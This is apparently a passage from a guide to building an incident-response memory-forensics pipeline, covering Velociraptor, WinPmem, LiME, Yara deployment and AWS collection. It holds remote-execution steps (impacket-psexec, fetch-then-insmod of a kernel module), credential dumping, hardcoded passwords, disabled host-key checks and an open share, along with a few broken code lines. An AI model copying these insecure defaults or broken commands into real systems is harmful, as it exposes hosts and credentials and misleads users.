.stats { display: flex; gap: 12px; margin-left: auto; }
.stat { background: #0f172a; padding: 6px 14px; border-radius: 6px; text-align: center; }
.stat-val { font-size: 18px; font-weight: 700; }
.stat-lbl { font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; }
.critical { color: #ef4444; } .high { color: #f97316; }
.medium { color: #eab308; } .low { color: #22c55e; }
.container { padding: 20px 24px; }
table { width: 100%; border-collapse: collapse; }
th { text-align: left; padding: 8px 12px; font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; border-bottom: 1px solid #1e293b; }
td { padding: 10px 12px; border-bottom: 1px solid #1e293b; }
tr:hover { background: #1e293b; cursor: pointer; }
.badge { display: inline-block; padding: 2px 8px; border-radius: 3px; font-size: 9px; font-weight: 600; }
.badge-critical { background: #450a0a; color: #ef4444; border: 1px solid #ef4444; }
.badge-high { background: #431407; color: #f97316; border: 1px solid #f97316; }
.badge-medium { background: #422006; color: #eab308; border: 1px solid #eab308; }
.badge-low { background: #052e16; color: #22c55e; border: 1px solid #22c55e; }
.status-pill { background: #1e293b; padding: 2px 8px; border-radius: 10px; font-size: 10px; }
.btn { background: #1e293b; border: 1px solid #334155; color: #94a3b8; padding: 6px 14px; border-radius: 6px; cursor: pointer; font-family: monospace; font-size: 11px; }
.btn:hover { border-color: #f59e0b; color: #f59e0b; }
</style>
</head>
<body>
<div class="header">
<h1>Memory Analysis Pipeline</h1>
<div class="stats">
<div class="stat"><div class="stat-val" id="total-count">-</div><div class="stat-lbl">Total</div></div>
<div class="stat"><div class="stat-val critical" id="critical-count">-</div><div class="stat-lbl">Critical</div></div>
<div class="stat"><div class="stat-val high" id="complete-count">-</div><div class="stat-lbl">Complete</div></div>
</div>
<button class="btn" onclick="triggerCorrelation()">Run Correlation</button>
<button class="btn" onclick="loadData()">Refresh</button>
</div>
<div class="container">
<table>
<thead><tr>
<th>Host</th><th>Tier</th><th>Risk</th>
<th>Status</th><th>Size</th><th>Suspicious Procs</th>
<th>Malfind</th><th>Connections</th>
</tr></thead>
<tbody id="host-table"></tbody>
</table>
</div>
<script>
async function loadData() {
const data = await fetch('/api/fleet-status').then(r => r.json());
document.getElementById('total-count').textContent = data.length;
document.getElementById('critical-count').textContent = data.filter(h => h.risk_label === 'CRITICAL').length;
document.getElementById('complete-count').textContent = data.filter(h => h.status === 'complete').length;
const tbody = document.getElementById('host-table');
tbody.innerHTML = data.map(h => `
<tr onclick="window.open('/api/host/${h.id}','_blank')">
<td style="font-weight:600">${h.hostname}</td>
<td>T${h.tier || '-'}</td>
<td><span class="badge badge-${(h.risk_label||'low').toLowerCase()}">${h.risk_label || 'N/A'}</span></td>
<td><span class="status-pill">${h.status}</span></td>
<td>${h.image_size_gb ? h.image_size_gb.toFixed(1) + ' GB' : '-'}</td>
<td style="color:${h.suspicious_process_count > 0 ? '#f97316' : '#64748b'}">${h.suspicious_process_count || 0}</td>
<td style="color:${h.has_malfind ? '#ef4444' : '#64748b'}">${h.has_malfind ? 'YES' : 'no'}</td>
<td>${h.network_conn_count || 0}</td>
</tr>
`).join('');
}
async function triggerCorrelation() {
await fetch('/api/trigger-correlation', {method: 'POST'});
alert('Correlation analysis triggered. Refresh in 60 seconds.');
}
loadData();
setInterval(loadData, 30000);
</script>
</body>
</html>
The CI/CD pipeline: GitHub Actions for automated ruleset deployment
The Yara ruleset, pipeline configuration, and correlation scripts need to be version controlled and automatically deployed when updated. A GitHub Actions workflow handles this: when a new Yara rule is pushed to the repository, the action compiles the full ruleset, tests it against clean samples, and deploys the updated compiled ruleset to the analysis server. This keeps the detection capability current without manual SSH sessions.
## .github/workflows/deploy_rules.yml
## Triggered on push to main branch when Yara rules change
name: Compile and Deploy Yara Rules
on:
push:
branches: [main]
paths:
- 'yara_rules/**'
- 'pipeline/**'
- 'requirements.txt'
jobs:
compile-and-test:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install yara-python pefile
sudo apt-get install -y yara
- name: Lint Yara rules individually
run: |
echo "Checking individual rule files..."
ERRORS=0
for rule_file in yara_rules/rules/*.yar; do
if ! yara "$rule_file" /dev/null 2>/dev/null; then
echo "SYNTAX ERROR: $rule_file"
ERRORS=$((ERRORS + 1))
else
echo "OK: $rule_file"
fi
done
if [ $ERRORS -gt 0 ]; then
echo "Found $ERRORS rule file(s) with errors"
exit 1
fi
- name: Compile combined ruleset
run: |
python3 pipeline/compile_rules.py
echo "Compiled ruleset size: $(du -sh yara_rules/combined.yar)"
- name: Test for false positives
run: |
# Download a small set of known-clean Windows binaries for FP testing
# In production, maintain a curated set of clean sample hashes
echo "Running false positive checks..."
python3 -c "
import yara, os
rules = yara.compile('yara_rules/combined.yar')
clean_bins = ['/bin/ls', '/bin/cat', '/usr/bin/python3']
fps = 0
for f in clean_bins:
if os.path.exists(f):
matches = rules.match(f)
if matches:
print(f'FP: {f} matched {[m.rule for m in matches]}')
fps += 1
print(f'False positive check: {fps} hits in clean files')
exit(fps > 2)
"
- name: Upload compiled ruleset artifact
uses: actions/upload-artifact@v4
with:
name: compiled-yara-rules
path: yara_rules/combined.yar
retention-days: 30
deploy:
needs: compile-and-test
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
environment: production
steps:
- name: Download compiled ruleset
uses: actions/download-artifact@v4
with:
name: compiled-yara-rules
- name: Deploy to analysis server
env:
DEPLOY_KEY: ${{ secrets.ANALYSIS_SERVER_DEPLOY_KEY }}
ANALYSIS_SERVER: ${{ secrets.ANALYSIS_SERVER_HOST }}
run: |
echo "$DEPLOY_KEY" > /tmp/deploy_key
chmod 600 /tmp/deploy_key
# Copy compiled rules to analysis server
scp -i /tmp/deploy_key -o StrictHostKeyChecking=no \
combined.yar \
analyst@$ANALYSIS_SERVER:/srv/memory/yara_rules/combined.yar
# Verify deployment and restart any running scans
ssh -i /tmp/deploy_key -o StrictHostKeyChecking=no \
analyst@$ANALYSIS_SERVER \
'ls -lh /srv/memory/yara_rules/combined.yar && echo "Deployment verified"'
rm /tmp/deploy_key
- name: Notify on deployment
if: always()
run: |
echo "Yara ruleset deployed at $(date -u)"
## .github/workflows/pipeline_tests.yml
## Integration tests for the processing pipeline
name: Pipeline Integration Tests
on:
push:
paths:
- 'pipeline/**'
pull_request:
paths:
- 'pipeline/**'
jobs:
test-pipeline:
runs-on: ubuntu-latest
services:
redis:
image: redis:7-alpine
ports:
- 6379:6379
postgres:
image: postgres:15-alpine
env:
POSTGRES_DB: memory_analysis
POSTGRES_USER: analyst
POSTGRES_PASSWORD: testpassword
ports:
- 5432:5432
options: --health-cmd pg_isready --health-interval 10s
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r requirements.txt
pip install pytest pytest-asyncio
- name: Initialize test database
env:
PGPASSWORD: testpassword
run: |
psql -h localhost -U analyst -d memory_analysis -f init_db.sql
- name: Run unit tests
env:
CELERY_BROKER_URL: redis://localhost:6379/0
POSTGRES_URL: postgresql://analyst:testpassword@localhost/memory_analysis
run: |
pytest tests/ -v --tb=short
- name: Test pipeline task imports
env:
CELERY_BROKER_URL: redis://localhost:6379/0
POSTGRES_URL: postgresql://analyst:testpassword@localhost/memory_analysis
run: |
python3 -c "
from pipeline.pipeline import (
validate_image, run_triage, run_deep_analysis,
extract_iocs, generate_report
)
print('All pipeline tasks imported successfully')
"
Operational runbook: running the pipeline during an active incident
All of the above infrastructure is built to run with minimal manual intervention during an incident. The following runbook describes the complete workflow from initial decision to collect through to analyst review of results.
## MEMORY COLLECTION RUNBOOK
## Version: 1.0 | Last Updated: 2026-01
## PHASE 1: DECISION AND SCOPING (5 minutes)
##
## 1. Run network impact estimation
python3 /srv/memory/network_impact.py \
--tier1-count 2 --tier1-ram 64 \
--tier2-count 10 --tier2-ram 32 \
--tier3-count 38 --tier3-ram 16 \
--link-speed-mbps 1000 \
--max-utilisation 0.30
## 2. Verify analysis server capacity
df -h /srv/memory/landing # Check storage available
free -h # Check RAM
nproc # Check CPU count
## 3. Verify pipeline is running
cd /srv/memory && docker-compose ps
systemctl status memory-watcher
## PHASE 2: CONFIGURE AND LAUNCH COLLECTION (10 minutes)
##
## 4. Update target list for this incident
cat > /srv/memory/targets_$(date +%Y%m%d).json << 'TARGETS'
{
"incident_id": "INC-2026-001",
"started_at": "2026-05-15T09:00:00Z",
"targets": [
{"hostname": "DC01", "client_id": "C.xxx", "tier": 1, "ram_gb": 64, "priority": true},
{"hostname": "DC02", "client_id": "C.yyy", "tier": 1, "ram_gb": 64},
{"hostname": "FILE01", "client_id": "C.zzz", "tier": 2, "ram_gb": 32},
{"hostname": "WS-JOHN", "client_id": "C.aaa", "tier": 3, "ram_gb": 16, "priority": true}
]
}
TARGETS
## 5. Launch orchestrated collection
python3 /srv/memory/collection_orchestrator.py \
--targets /srv/memory/targets_$(date +%Y%m%d).json \
--config /etc/velociraptor/server.config.yaml
## PHASE 3: MONITOR PROGRESS (ongoing)
##
## 6. Watch pipeline status
watch -n 30 'psql postgresql://analyst:changeme@localhost/memory_analysis \
-c "SELECT hostname, status, risk_score FROM memory_images \
LEFT JOIN triage_results tr ON tr.image_id=memory_images.id \
ORDER BY risk_score DESC NULLS LAST;"'
## 7. Open analyst dashboard
echo "Dashboard: http://$(hostname -I | awk '{print $1}'):8080"
echo "Celery monitor: http://$(hostname -I | awk '{print $1}'):5555"
## 8. Monitor network utilisation on analysis server
sar -n DEV 5 | grep eth0
## PHASE 4: TRIAGE RESULTS AS THEY ARRIVE (ongoing)
##
## 9. Query for completed high-risk hosts immediately
psql postgresql://analyst:changeme@localhost/memory_analysis <= 20
AND mi.status = 'complete'
ORDER BY tr.risk_score DESC;
QUERY
## 10. Run fleet correlation once 50%+ of images are complete
python3 /srv/memory/cross_correlation.py
## 11. Review fleet report
cat /srv/memory/reports/fleet_correlation.json | python3 -m json.tool | head -100
## PHASE 5: DEEP DIVE ON PRIORITY HOSTS
##
## 12. For any CRITICAL host, run additional Volatility plugins manually
IMAGE=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-t -c "SELECT image_path FROM memory_images WHERE hostname='DC01';" | tr -d ' ')
source /opt/vol3-env/bin/activate
# Additional plugins not in the automated pipeline
vol -f $IMAGE windows.cmdline # All process command lines
vol -f $IMAGE windows.dlllist --pid 123 # DLLs in specific PID
vol -f $IMAGE windows.handles --pid 123 # Open handles
vol -f $IMAGE windows.svcscan # Service enumeration
vol -f $IMAGE windows.drivermodule # Kernel driver verification
vol -f $IMAGE windows.timers # Kernel timer objects (rootkit indicator)
vol -f $IMAGE windows.registry.hivescan # Registry hive locations
vol -f $IMAGE windows.credentials # Cached credentials
Storage management and image lifecycle
Memory images are large. Fifty images from a typical enterprise investigation consume between 500GB and 2TB of storage. Without lifecycle management the analysis server fills up, and raw memory images contain sensitive data (credentials, encryption keys, personal information from user sessions) that should not persist indefinitely.
## storage_lifecycle.py - Automated image lifecycle management
#!/usr/bin/env python3
"""
Manages memory image storage lifecycle:
- Moves completed images to cold storage after analysis
- Archives reports to long-term storage
- Securely deletes raw images after retention period
- Compresses reports for long-term retention
"""
import os
import shutil
import logging
import psycopg2
from datetime import datetime, timedelta
from pathlib import Path
log = logging.getLogger(__name__)
POSTGRES_URL = 'postgresql://analyst:changeme@localhost/memory_analysis'
# Configuration
HOT_STORAGE = Path('/srv/memory/landing') # Fast NVMe
COLD_STORAGE = Path('/srv/memory/archive') # Slower HDD
REPORT_ARCHIVE = Path('/srv/memory/reports/archive')
RETENTION_DAYS = 90 # Keep raw images for 90 days after analysis complete
def get_db():
return psycopg2.connect(POSTGRES_URL)
def move_to_cold_storage():
"""Move completed and analysed images to slower cold storage."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT id, hostname, image_path
FROM memory_images
WHERE status = 'complete'
AND image_path LIKE %s
AND received_at < NOW() - INTERVAL '24 hours'
""", (str(HOT_STORAGE) + '%',))
rows = cur.fetchall()
for image_id, hostname, image_path in rows:
src = Path(image_path)
if not src.exists():
continue
dest_dir = COLD_STORAGE / hostname
dest_dir.mkdir(parents=True, exist_ok=True)
dest = dest_dir / src.name
log.info(f"Moving {hostname} image to cold storage: {src.stat().st_size / 1e9:.1f}GB")
shutil.move(str(src), str(dest))
with get_db() as conn:
with conn.cursor() as cur:
cur.execute(
"UPDATE memory_images SET image_path = %s WHERE id = %s",
(str(dest), image_id)
)
conn.commit()
def purge_expired_images():
"""Securely delete raw images older than retention period."""
cutoff = datetime.now() - timedelta(days=RETENTION_DAYS)
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT id, hostname, image_path
FROM memory_images
WHERE status = 'complete'
AND received_at < %s
AND image_path IS NOT NULL
""", (cutoff,))
rows = cur.fetchall()
for image_id, hostname, image_path in rows:
img = Path(image_path)
if not img.exists():
continue
size_gb = img.stat().st_size / 1e9
log.info(f"Purging expired image: {hostname} ({size_gb:.1f}GB, ID {image_id})")
# Secure deletion: overwrite before removing
# For SSDs this is limited in effectiveness - consider full-disk encryption instead
try:
with open(img, 'r+b') as f:
length = os.path.getsize(img)
f.write(os.urandom(min(length, 1024 * 1024))) # Overwrite first 1MB
img.unlink()
log.info(f"Purged: {hostname}")
except Exception as e:
log.error(f"Purge failed for {hostname}: {e}")
continue
with get_db() as conn:
with conn.cursor() as cur:
cur.execute(
"UPDATE memory_images SET image_path = NULL, status = 'purged' WHERE id = %s",
(image_id,)
)
conn.commit()
def archive_reports():
"""Compress and archive reports older than 7 days."""
import tarfile
cutoff = datetime.now() - timedelta(days=7)
REPORT_ARCHIVE.mkdir(parents=True, exist_ok=True)
for report_dir in Path('/srv/memory/reports').iterdir():
if not report_dir.is_dir() or report_dir == REPORT_ARCHIVE:
continue
mtime = datetime.fromtimestamp(report_dir.stat().st_mtime)
if mtime < cutoff:
archive_name = REPORT_ARCHIVE / f"{report_dir.name}_{mtime.strftime('%Y%m%d')}.tar.gz"
with tarfile.open(archive_name, 'w:gz') as tar:
tar.add(report_dir, arcname=report_dir.name)
shutil.rmtree(report_dir)
log.info(f"Archived reports for {report_dir.name}")
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
log.info("Running storage lifecycle management")
move_to_cold_storage()
purge_expired_images()
archive_reports()
log.info("Storage lifecycle complete")
## Cron schedule for lifecycle management
## Add to /etc/cron.d/memory-pipeline
# Run lifecycle management at 3am daily
0 3 * * * analyst /opt/vol3-env/bin/python3 /srv/memory/storage_lifecycle.py >> /srv/memory/logs/lifecycle.log 2>&1
# Compile and deploy Yara rules at midnight
0 0 * * * analyst /opt/vol3-env/bin/python3 /srv/memory/compile_rules.py >> /srv/memory/logs/rules.log 2>&1
# Run fleet correlation every 2 hours during business hours
0 8,10,12,14,16,18 * * 1-5 analyst /opt/vol3-env/bin/python3 /srv/memory/cross_correlation.py >> /srv/memory/logs/correlation.log 2>&1
Performance tuning and benchmarks
With the full pipeline running, the throughput you can expect depends on your analysis server hardware. These benchmarks are from a test deployment with 32 cores, 128GB RAM, and NVMe storage.
## Pipeline performance benchmark script
## Run this against a test image to measure your pipeline throughput
#!/usr/bin/env python3
import subprocess, time, json
from pathlib import Path
def benchmark_volatility_plugins(image_path: str):
plugins = [
('windows.pslist', 'Process list'),
('windows.netscan', 'Network connections'),
('windows.malfind', 'Injection detection'),
('windows.callbacks', 'Kernel callbacks'),
('windows.cmdline', 'Command lines'),
('windows.dlllist', 'Module list'),
]
print(f"Benchmarking Volatility 3 against: {image_path}")
print(f"Image size: {Path(image_path).stat().st_size / 1e9:.1f} GB\n")
print(f"{'Plugin':<30} {'Time (s)':<12} {'Records':<10}")
print("-" * 55)
total_time = 0
for plugin, description in plugins:
start = time.time()
result = subprocess.run(
['/opt/vol3-env/bin/vol', '-f', image_path,
'--renderer', 'json', plugin],
capture_output=True, text=True, timeout=600
)
elapsed = time.time() - start
total_time += elapsed
try:
data = json.loads(result.stdout)
count = len(data.get('rows', data)) if isinstance(data, dict) else len(data)
except:
count = 0
print(f"{plugin:<30} {elapsed:<12.1f} {count:<10}")
print("-" * 55)
print(f"{'TOTAL':<30} {total_time:<12.1f}")
print(f"\nFull triage pipeline: ~{total_time/60:.1f} minutes per image")
print(f"Parallel capacity (32 cores): ~{int(32 / 4)} images simultaneously")
print(f"Estimated fleet throughput: ~{int((32/4) * (3600/total_time))} images/hour")
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("Usage: benchmark.py ")
sys.exit(1)
benchmark_volatility_plugins(sys.argv[1])
Putting the complete pipeline together
Everything described in this post forms a coherent system when deployed together. Velociraptor provides the collection layer with configurable throttling and tiered concurrency to protect the production network. The image watcher provides the trigger layer, detecting new images and starting the processing chain without manual intervention. Celery and the task pipeline provide the processing layer, automatically running triage and deep analysis in sequence, storing structured results in PostgreSQL. Cross-image correlation provides the intelligence layer, connecting findings across all machines to identify the full scope of an intrusion. The Flask dashboard provides the analyst interface for reviewing results under incident pressure. GitHub Actions provides the operational layer, keeping the Yara ruleset current and deployed without manual SSH sessions.
The network protection considerations are baked into every collection decision: tiered concurrency limits based on available bandwidth, per-client throttling, QoS marking for de-prioritisation under load, and off-hours scheduling for non-urgent collections. A well-tuned deployment of this pipeline running on a 1Gbps network can collect from 50 endpoints within a six-to-eight hour window while keeping collection-related bandwidth below 30% of the available link capacity throughout.
The most important principle in fleet memory analysis is that speed matters but correctness matters more. A partial or interrupted memory image is worse than no image because it gives false confidence. The validation stage in the pipeline exists for a reason: verifying SHA256 and image size before analysis starts catches failed transfers early rather than after significant CPU time has been spent on an incomplete image. Never skip validation under time pressure.
Everything here is designed to be adapted. Your environment has different endpoint counts, different network topology, different hardware constraints, and different Velociraptor deployment configurations than the examples used throughout. The scripts are starting points rather than finished products. The architecture, the tiering logic, the processing stages, and the correlation approach are the durable parts. The specific Python code is intended to give you a working foundation to build from rather than a drop-in solution that works without modification.
Alternative collection method 1: WinPmem standalone (no agent required)
Velociraptor is the right answer when you have agents deployed. When you do not, whether because the endpoint was newly discovered, because the Velociraptor agent failed, or because you are working in an environment where agent deployment is not possible, WinPmem can be run directly as a standalone executable with no installation required. It is a single binary, runs from a USB drive or a UNC path, and produces a raw memory image that the analysis pipeline accepts without modification.
The critical operational detail with standalone WinPmem is output staging. Avoid writing the image to the target system’s own disk where possible. If you write a 16GB image to C:\Windows\Temp you are adding 16GB of write activity to a potentially compromised system, potentially overwriting slack space that contains forensic evidence, and relying on the target disk having enough free space. Writing directly to a network share or an external drive avoids all of these problems.
## WinPmem standalone collection
## Download: https://github.com/Velocidex/WinPmem/releases
## Option 1: Write directly to a network share (preferred)
## The share should be on your analysis server, write-only for the target
# On the analysis server - create write-only collection share
net share MemCollection=C:\MemCollection /GRANT:"Everyone,CHANGE"
# Or on Linux analysis server via Samba:
# [MemCollection]
# path = /srv/memory/landing
# writable = yes
# create mask = 0644
# guest ok = yes # Only on isolated IR network
## On the target Windows system (run as Administrator):
winpmem_mini_x64.exe \\analysis-server\MemCollection\%COMPUTERNAME%_%DATE:~-4%%DATE:~3,2%%DATE:~0,2%.raw
## Option 2: Write locally then transfer (when network share unavailable)
winpmem_mini_x64.exe C:\Windows\Temp\mem.raw
## Transfer with throttled robocopy (limits bandwidth to ~80Mbps)
robocopy C:\Windows\Temp \\analysis-server\MemCollection mem.raw /J /IPG:1
## Option 3: Pipe directly to compressed output (reduces disk footprint)
winpmem_mini_x64.exe - | gzip -1 > \\analysis-server\MemCollection\%COMPUTERNAME%.raw.gz
## Wrapper script for multiple standalone targets
## Run from the analysis server via PsExec or similar remote execution
#!/usr/bin/env python3
"""
Standalone WinPmem deployment script for environments without Velociraptor.
Copies WinPmem to target via admin share, runs acquisition, transfers image.
"""
import subprocess
import time
import logging
from pathlib import Path
from datetime import datetime
log = logging.getLogger(__name__)
WINPMEM_PATH = '/srv/memory/tools/winpmem_mini_x64.exe'
LANDING_DIR = '/srv/memory/landing'
ADMIN_CREDS = 'domain\\iruser:Password123!' # Use vault in production
def collect_standalone(hostname: str, ram_gb: float = 16) -> bool:
"""Deploy WinPmem to a target and collect memory."""
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
output_name = f"{hostname}_{timestamp}.raw"
output_unc = f"\\\\{hostname}\\C$\\Windows\\Temp\\mem_ir.raw"
local_dest = f"{LANDING_DIR}/{output_name}"
log.info(f"Starting standalone collection from {hostname}")
# Step 1: Copy WinPmem to target via admin share
copy_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth', # credentials file
'-c', f'put {WINPMEM_PATH} Windows\\Temp\\winpmem.exe'
]
result = subprocess.run(copy_cmd, capture_output=True, text=True, timeout=60)
if result.returncode != 0:
log.error(f"Failed to copy WinPmem to {hostname}: {result.stderr}")
return False
# Step 2: Execute WinPmem remotely via impacket psexec
# Estimate time: roughly 1 minute per 4GB of RAM at ~70MB/s write speed
timeout = int((ram_gb / 4) * 60) + 120
exec_cmd = [
'impacket-psexec',
'-hashes', ':',
f'domain/iruser@{hostname}',
f'C:\\Windows\\Temp\\winpmem.exe C:\\Windows\\Temp\\mem_ir.raw'
]
log.info(f"Running WinPmem on {hostname} (estimated {timeout//60} min)")
result = subprocess.run(exec_cmd, capture_output=True, text=True, timeout=timeout)
if result.returncode != 0:
log.error(f"WinPmem execution failed on {hostname}")
return False
# Step 3: Transfer the image back
log.info(f"Transferring image from {hostname}")
transfer_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth',
'-c', f'get Windows\\Temp\\mem_ir.raw {local_dest}'
]
result = subprocess.run(transfer_cmd, capture_output=True, text=True,
timeout=7200) # 2 hour timeout for transfer
if result.returncode != 0:
log.error(f"Transfer failed from {hostname}: {result.stderr}")
return False
# Step 4: Clean up temp files on target
cleanup_cmd = [
'smbclient', f'//{hostname}/C$',
'-A', '/etc/memory-ir/smb.auth',
'-c', 'del Windows\\Temp\\winpmem.exe; del Windows\\Temp\\mem_ir.raw'
]
subprocess.run(cleanup_cmd, capture_output=True, timeout=30)
log.info(f"Standalone collection complete: {local_dest}")
return True
Alternative collection method 2: LiME for Linux endpoints
Linux memory acquisition requires a different approach because there is no WinPmem equivalent that works across all kernel versions without compilation. LiME (Linux Memory Extractor) is a loadable kernel module that, when inserted, exposes physical memory through a network socket or a local file. The challenge is that LiME must be compiled against the exact kernel version running on the target, which means maintaining a library of pre-compiled modules or building on demand.
The build-on-demand approach is more maintainable for a fleet where kernel versions vary across different distro versions and patch levels. A build server with Docker can compile the correct LiME module for any target kernel version in under two minutes.
## LiME build server setup
## Builds LiME modules for arbitrary kernel versions on demand
#!/bin/bash
## build_lime.sh - Build LiME for a specific kernel version
## Usage: ./build_lime.sh 5.15.0-91-generic ubuntu:22.04
KERNEL_VERSION=$1
DOCKER_IMAGE=${2:-ubuntu:22.04}
OUTPUT_DIR=/srv/memory/lime_modules
mkdir -p $OUTPUT_DIR
docker run --rm \
-v $OUTPUT_DIR:/output \
-e KERNEL_VERSION=$KERNEL_VERSION \
$DOCKER_IMAGE bash -c "
apt-get update -qq
apt-get install -y -qq \
linux-headers-$KERNEL_VERSION \
build-essential \
git 2>/dev/null
git clone --depth 1 https://github.com/504ensicsLabs/LiME /tmp/lime
cd /tmp/lime/src
make -C /lib/modules/$KERNEL_VERSION/build M=\$(pwd) modules
cp lime.ko /output/lime-$KERNEL_VERSION.ko
echo '[+] Built: lime-$KERNEL_VERSION.ko'
"
echo "Module available at: $OUTPUT_DIR/lime-$KERNEL_VERSION.ko"
## Linux memory collection script using LiME
## Run as root on the target Linux system
#!/bin/bash
## collect_linux_memory.sh
set -euo pipefail
ANALYSIS_SERVER="192.168.1.100"
COLLECTION_PORT="4444"
KERNEL_VER=$(uname -r)
HOSTNAME=$(hostname -s)
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
MODULE_DIR="/tmp/lime_modules"
OUTPUT_FILE="/tmp/mem_${HOSTNAME}_${TIMESTAMP}.lime"
echo "[*] Linux memory collection starting"
echo " Hostname: $HOSTNAME"
echo " Kernel: $KERNEL_VER"
echo " RAM: $(free -h | awk '/^Mem:/{print $2}')"
# Check if pre-built module exists locally
if [ -f "$MODULE_DIR/lime-$KERNEL_VER.ko" ]; then
echo "[*] Using pre-built module"
LIME_MODULE="$MODULE_DIR/lime-$KERNEL_VER.ko"
else
echo "[*] Fetching pre-built module from build server"
mkdir -p $MODULE_DIR
wget -q "http://$ANALYSIS_SERVER:8888/lime/lime-$KERNEL_VER.ko" \
-O "$MODULE_DIR/lime-$KERNEL_VER.ko" 2>/dev/null || {
echo "[!] Module not available for kernel $KERNEL_VER"
echo "[!] Build it first: ./build_lime.sh $KERNEL_VER"
exit 1
}
LIME_MODULE="$MODULE_DIR/lime-$KERNEL_VER.ko"
fi
# Option A: Acquire to file then transfer (for large images or slow networks)
echo "[*] Acquiring memory to local file"
insmod $LIME_MODULE "path=$OUTPUT_FILE format=lime timeout=0"
rmmod lime
echo "[*] Image size: $(du -sh $OUTPUT_FILE | cut -f1)"
echo "[*] SHA256: $(sha256sum $OUTPUT_FILE | cut -d' ' -f1)"
# Transfer with throttled nc to avoid network saturation
# pv limits bandwidth; remove if pv unavailable
echo "[*] Transferring to analysis server"
pv -L 50m "$OUTPUT_FILE" | \
ssh analyst@$ANALYSIS_SERVER \
"cat > /srv/memory/landing/${HOSTNAME}_${TIMESTAMP}.lime"
# Clean up local staging file
shutil rm -f "$OUTPUT_FILE" "$LIME_MODULE"
echo "[+] Collection complete"
# Option B: Acquire directly over network (no local disk needed)
# Useful when target disk is nearly full or disk write should be avoided
# On analysis server first: nc -l -p 4444 > hostname_timestamp.lime
# Then on target:
# insmod lime.ko "path=tcp:4444 format=lime"
# This streams memory directly to the analysis server
## Velociraptor artefact for Linux memory collection
## Handles module deployment and acquisition automatically
name: Custom.Linux.Memory.Acquire
description: |
Acquires Linux physical memory using LiME.
Downloads the correct kernel module from the build server,
loads it, captures memory, and uploads to Velociraptor server.
type: CLIENT
parameters:
- name: BuildServerURL
description: URL of the LiME module build/distribution server
default: "http://192.168.1.100:8888/lime"
- name: ThrottleMBps
description: Transfer throttle in MB/s
default: "10"
type: int
sources:
- name: LinuxMemoryAcquisition
query: |
LET kernel_version = shell(cmd="uname -r", sep="\n")[0].Stdout
LET hostname = info().Fqdn
LET timestamp = format(format="%d", args=[now()])
LET module_url = format(format="%v/lime-%v.ko",
args=[BuildServerURL, kernel_version])
LET module_path = "/tmp/lime_ir.ko"
LET output_path = format(format="/tmp/mem_%v_%v.lime",
args=[hostname, timestamp])
-- Download the LiME module for this kernel
LET download = SELECT * FROM http_client(
url=module_url,
method="GET",
output=module_path
)
-- Load LiME and capture memory
LET capture = SELECT * FROM execve(argv=[
"insmod", module_path,
format(format="path=%v format=lime timeout=0", args=[output_path])
])
-- Unload module
LET unload = SELECT * FROM execve(argv=["rmmod", "lime"])
-- Upload and clean up
SELECT
upload(path=output_path,
name=format(format="%v_%v.lime", args=[hostname, timestamp])) AS Upload,
execve(argv=["rm", "-f", output_path, module_path]) AS Cleanup
FROM scope()
Alternative collection method 3: cloud-native collection (AWS and Azure)
Cloud instances present a fundamentally different collection challenge. You cannot insert a kernel module into an EC2 instance without kernel headers matching the exact AMI version. Network egress costs make large file transfers expensive. Snapshot-based collection avoids both problems by capturing memory-equivalent state through the cloud provider’s own APIs without touching the running instance.
AWS provides memory snapshots of EC2 instances directly through the EC2 API using the CreateSnapshot capability combined with EBS volume snapshots. For Windows EC2 instances, Hibernation must be enabled on the instance to get a full memory capture via snapshot. For Linux, the approach is to use the SSM agent to run a collection script directly on the instance, similar to the standalone approach.
## AWS EC2 memory collection via snapshot
## Requires: boto3, appropriate IAM permissions
#!/usr/bin/env python3
"""
Cloud-native memory collection for AWS EC2 instances.
Uses EC2 Snapshot for Windows (requires hibernation enabled)
and SSM Run Command + LiME for Linux instances.
"""
import boto3
import time
import json
import logging
from datetime import datetime
from typing import Optional
log = logging.getLogger(__name__)
def collect_windows_ec2_snapshot(
instance_id: str,
region: str = 'ap-southeast-2',
s3_bucket: str = 'ir-memory-collection'
) -> Optional[str]:
"""
Capture Windows EC2 memory via hibernation snapshot.
NOTE: Instance must have hibernation enabled at launch time.
WARNING: This stops the instance temporarily.
"""
ec2 = boto3.client('ec2', region_name=region)
log.warning(f"Starting hibernation snapshot for {instance_id}")
log.warning("This will STOP the instance temporarily")
# Tag the instance for IR tracking
ec2.create_tags(
Resources=[instance_id],
Tags=[
{'Key': 'IR-Collection', 'Value': datetime.now().isoformat()},
{'Key': 'IR-Status', 'Value': 'collecting'}
]
)
# Stop with hibernation to preserve memory state in EBS
response = ec2.stop_instances(
InstanceIds=[instance_id],
Hibernate=True # Writes RAM to EBS volume
)
# Wait for instance to stop (hibernation saves RAM to disk)
log.info(f"Waiting for {instance_id} to hibernate...")
waiter = ec2.get_waiter('instance_stopped')
waiter.wait(InstanceIds=[instance_id])
log.info("Instance hibernated - RAM saved to EBS")
# Get the root EBS volume
instance = ec2.describe_instances(InstanceIds=[instance_id])
root_device = instance['Reservations'][0]['Instances'][0]['RootDeviceName']
volumes = instance['Reservations'][0]['Instances'][0]['BlockDeviceMappings']
root_vol_id = None
for v in volumes:
if v['DeviceName'] == root_device:
root_vol_id = v['Ebs']['VolumeId']
break
if not root_vol_id:
log.error("Could not find root volume")
return None
# Create snapshot of the hibernated volume (contains RAM image)
snapshot = ec2.create_snapshot(
VolumeId=root_vol_id,
Description=f"IR memory collection {instance_id} {datetime.now().isoformat()}",
TagSpecifications=[{
